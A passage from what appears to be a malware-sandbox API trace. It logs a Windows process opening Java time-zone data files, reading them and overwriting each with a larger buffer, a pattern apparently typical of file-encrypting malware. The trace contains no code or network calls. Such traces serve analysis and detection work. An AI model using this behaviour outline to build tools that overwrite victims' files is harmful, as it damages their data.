lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.014] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1b [0131.014] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.014] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.014] ReleaseMutex (hMutex=0x168) returned 1 [0131.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EST", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0131.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EST", cchWideChar=3, lpMultiByteStr=0x1f7acfc, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EST", lpUsedDefaultChar=0x0) returned 3 [0131.014] ReadFile (in: hFile=0x204, lpBuffer=0x1f88678, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88678*, lpNumberOfBytesRead=0x345f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0131.015] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.015] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0131.016] CloseHandle (hObject=0x204) returned 1 [0131.016] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.019] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.019] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1b [0131.019] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.019] ReleaseMutex (hMutex=0x168) returned 1 [0131.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+3", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+3", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+3", lpUsedDefaultChar=0x0) returned 5 [0131.019] ReadFile (in: hFile=0x204, lpBuffer=0x1f88678, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88678*, lpNumberOfBytesRead=0x345f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0131.021] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.021] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0131.021] CloseHandle (hObject=0x204) returned 1 [0131.022] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-10"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.610] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.610] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1b [0131.610] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.610] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.610] ReleaseMutex (hMutex=0x168) returned 1 [0131.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-10", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0131.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-10", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-10", lpUsedDefaultChar=0x0) returned 6 [0131.610] ReadFile (in: hFile=0x204, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x345f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0131.612] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.612] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0131.612] CloseHandle (hObject=0x204) returned 1 [0131.612] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.614] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.614] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1b [0131.614] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.614] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.614] ReleaseMutex (hMutex=0x168) returned 1 [0131.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-5", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-5", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-5", lpUsedDefaultChar=0x0) returned 5 [0131.614] ReadFile (in: hFile=0x204, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x345f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0131.616] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.616] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0131.616] CloseHandle (hObject=0x204) returned 1 [0131.616] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\andorra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.619] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.619] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3c8 [0131.619] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.619] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.619] ReleaseMutex (hMutex=0x168) returned 1 [0131.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Andorra", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0131.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Andorra", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Andorra", lpUsedDefaultChar=0x0) returned 7 [0131.619] ReadFile (in: hFile=0x204, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3c8, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x345f2bc*=0x3c8, lpOverlapped=0x0) returned 1 [0131.622] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.622] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x950, lpOverlapped=0x0) returned 1 [0131.622] CloseHandle (hObject=0x204) returned 1 [0131.622] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\copenhagen"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.624] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.624] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x480 [0131.624] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.624] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.624] ReleaseMutex (hMutex=0x168) returned 1 [0131.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Copenhagen", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Copenhagen", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copenhagen", lpUsedDefaultChar=0x0) returned 10 [0131.625] ReadFile (in: hFile=0x204, lpBuffer=0x1ea3e68, nNumberOfBytesToRead=0x480, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3e68*, lpNumberOfBytesRead=0x345f2bc*=0x480, lpOverlapped=0x0) returned 1 [0131.628] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.628] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa08, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0xa08, lpOverlapped=0x0) returned 1 [0131.628] CloseHandle (hObject=0x204) returned 1 [0131.628] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\london"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.630] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.630] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7e8 [0131.630] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.630] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.630] ReleaseMutex (hMutex=0x168) returned 1 [0131.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="London", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0131.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="London", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="London", lpUsedDefaultChar=0x0) returned 6 [0131.630] ReadFile (in: hFile=0x204, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x7e8, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x345f2bc*=0x7e8, lpOverlapped=0x0) returned 1 [0131.633] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.633] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x345f2d0*=0xd70, lpOverlapped=0x0) returned 1 [0131.633] CloseHandle (hObject=0x204) returned 1 [0131.633] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\paris"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.635] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.635] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x620 [0131.636] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.636] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.636] ReleaseMutex (hMutex=0x168) returned 1 [0131.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Paris", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Paris", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Paris", lpUsedDefaultChar=0x0) returned 5 [0131.636] ReadFile (in: hFile=0x204, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x345f2bc*=0x620, lpOverlapped=0x0) returned 1 [0131.638] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.638] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0xba8, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x345f2d0*=0xba8, lpOverlapped=0x0) returned 1 [0131.639] CloseHandle (hObject=0x204) returned 1 [0131.639] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tallinn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0131.641] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.641] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x438 [0131.641] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0131.641] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.641] ReleaseMutex (hMutex=0x168) returned 1 [0131.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tallinn", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0131.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tallinn", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tallinn", lpUsedDefaultChar=0x0) returned 7 [0131.641] ReadFile (in: hFile=0x204, lpBuffer=0x269c668, nNumberOfBytesToRead=0x438, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x345f2bc*=0x438, lpOverlapped=0x0) returned 1 [0131.643] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0131.644] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x9c0, lpOverlapped=0x0) returned 1 [0131.644] CloseHandle (hObject=0x204) returned 1 [0131.644] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zaporozhye"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0132.040] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.040] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x430 [0132.040] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.041] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.041] ReleaseMutex (hMutex=0x168) returned 1 [0132.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Zaporozhye", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0132.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Zaporozhye", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Zaporozhye", lpUsedDefaultChar=0x0) returned 10 [0132.041] ReadFile (in: hFile=0x1f0, lpBuffer=0x269c668, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x345f2bc*=0x430, lpOverlapped=0x0) returned 1 [0132.337] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0132.337] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9b8, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x345f2d0*=0x9b8, lpOverlapped=0x0) returned 1 [0132.337] CloseHandle (hObject=0x1f0) returned 1 [0132.338] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\comoro"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.358] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.358] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x41 [0132.359] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.359] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.359] ReleaseMutex (hMutex=0x168) returned 1 [0132.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Comoro", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0132.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Comoro", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Comoro", lpUsedDefaultChar=0x0) returned 6 [0132.359] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x345f2bc*=0x41, lpOverlapped=0x0) returned 1 [0132.360] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0132.360] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0132.360] CloseHandle (hObject=0x1cc) returned 1 [0132.361] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.363] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0132.363] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: 